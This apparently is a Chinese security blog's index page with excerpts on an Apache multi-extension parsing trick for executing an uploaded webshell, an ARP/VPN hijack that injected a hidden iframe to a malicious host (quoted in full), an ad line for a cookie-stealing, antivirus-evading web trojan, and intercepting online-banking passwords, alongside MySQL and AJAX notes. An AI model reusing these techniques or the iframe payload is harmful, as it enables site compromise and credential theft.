apache 文件名解析时，是从后面开始检查后缀，按最后一个合法后缀执行。如：cmdshell.php.amxku 因为amxku不被apache解析，所以apache把这个文件当php文件解析了。

可以参见http://www.4ngel.net/article/63.htm

在国外的一个什么站点上找到的,如果要加到 httpd.conf 的配置里,还不知道要怎么弄。先记录一下。

如果哪位朋友有更好的办法，交流下amxku_at_msn.com。

一个站有可能经历gb2312(gbk,big5)到utf8的转换过程，其中会遇到很多的问题。站点太庞大了怎么办呢，只能一步步来了。要是能在极少改动前端代码的情况下，先完成数据的转换将会使整件事情容易得多。经过几天测试终于发现，Mysql以utf8存储gbk输出是可以实现的。mysql4.1后都有个特性，可以指定当前客户端连接所使用的字符集，mysql默认都是latin1，或由mysql server端配置的字符集进行连接校对。我使用utf8_general_ci来创建字段。

» 阅读全文

经过一天的折腾，终于是到家了。

累得不行，呵。不过在内蒙也不错，项目都已经搞定了，已经验收了。用户对我们的工作也还算是满意吧。不过也得好好的总结一下，毕竟还是存在着一些问题。下个星期又开始新的生活了。

前几天BOSS传给我一个IIS的溢出。哈哈，当时兴奋了半天，传说中的iis6远程溢出啊，哈哈。丢几个图看看。

郁闷来着，今天也被ARP玩了一回
本来好好的，突然发现www.sebug.net 主页上有马<iframe src='http://xxx.44986.com/bbs/data/xxx.html' height=2 width=0></iframe> 
郁闷，不太可能吧，不敢相信来着
我立马把站点关闭了。
查了半天没有发现什么问题，代码正常啊
咋回事呢，也没有发现机器不正常。

我用另一台机器开看sebug.net是正常的。难道是传说中的ARP会话截持。我是用路由拔号的，内网就两台机器，另一台还没开机呢，也没可能啊。而且我在另一台机器上打开网站也是正常的，没有被截持。我自己的机器打开红狼等很多网站都出现这样的情况，现在确定是被截持了。还是没有找到问题所在。问了几个朋友，无语。

我把所有的东东都关了，什么QQ，MSN……，晕，还是不行，VPN还没有断开，断开试试

VPN一断开，好了，晕，难道是VPN的IP被截持了，再连接上VPN又被截持了。试了几次，一样的情况
是VPN被截持了

有朋友用61.152.91.2这个VPN的，先别用了吧

ARP，牛……

在NEEAO那找到一个ARP的东东，好像可能实现这样的功能

不卡IE，记录Cookies，只关一次IE，更好的保护您的网马，采用多次不同方式的加密，过绝大多数杀毒

前言：本文还是去年年初写的，当时出于安全考虑没放出来。现在部分网上银行已大幅度降低了无高级别安全措施情况下的转账限额，并建议用户使用动态口令卡或者USB Key，总体安全系数有所提高。

随着子商务的普及，网上银行以及在线电子支付等方式逐渐被网民所接受和喜爱。但是网上银行以及电子商务支付平台的安全性不容乐观。尽管各网上银行采取 SSL加密防止通过嗅探网络封包的方式截取密码；对于防止WEB登陆时密码被窃取，网上银行采取了安全控件或者动态软键盘的方法，但考虑的仍不全面，我们还是能采取相应的方法截获用户输入的密码。

» 阅读全文

１、研究说明

　　Tencent在tqq.tencent.com的8000有一个使用HTTP的qq接口，通过这个接口，可以进行一些基本的操作，如：登陆、登出、改变登陆状态(上线、忙碌、离线、隐身)、添加删除好友、查看好友信息、发送验证信息(接受被加为好友、申请加对方为好友、拒绝被加为好友)、收发用户消息、系统信息。

　　目前我研究的是1.1版本的HTTP QQ协议，研究是微程在的成果上进行的，不敢说有什么超越，只不过更为详细和准确。

２、接口说明：

　　接口位置：tqq.tencent.com:8000
通信协议：HTTP
数据传输方法：POST
HTTP请求格式：

» 阅读全文

        AJAX无疑是2005年炒的最热的Web开发技术之一，当然，这个功劳离不开Google。我只是一个普通开发者，使用AJAX的地方不是特别多，我就简单的把我使用的心得说一下。(本文假设用户已经具有JavaScript、HTML、CSS等基本的Web开发能力)
　　[AJAX介绍] 　　
         Ajax是使用客户端脚本与Web服务器交换数据的Web应用开发方法。Web页面不用打断交互流程进行重新加裁，就可以动态地更新。使用Ajax，用户可以创建接近本地桌面应用的直接、高可用、更丰富、更动态的Web用户界面。　　
        异步JavaScript和XML(AJAX)不是什么新技术，而是使用几种现有技术——包括级联样式表(CSS)、JavaScript、XHTML、XML和可扩展样式语言转换(XSLT)，开发外观及操作类似桌面软件的Web应用软件。

» 阅读全文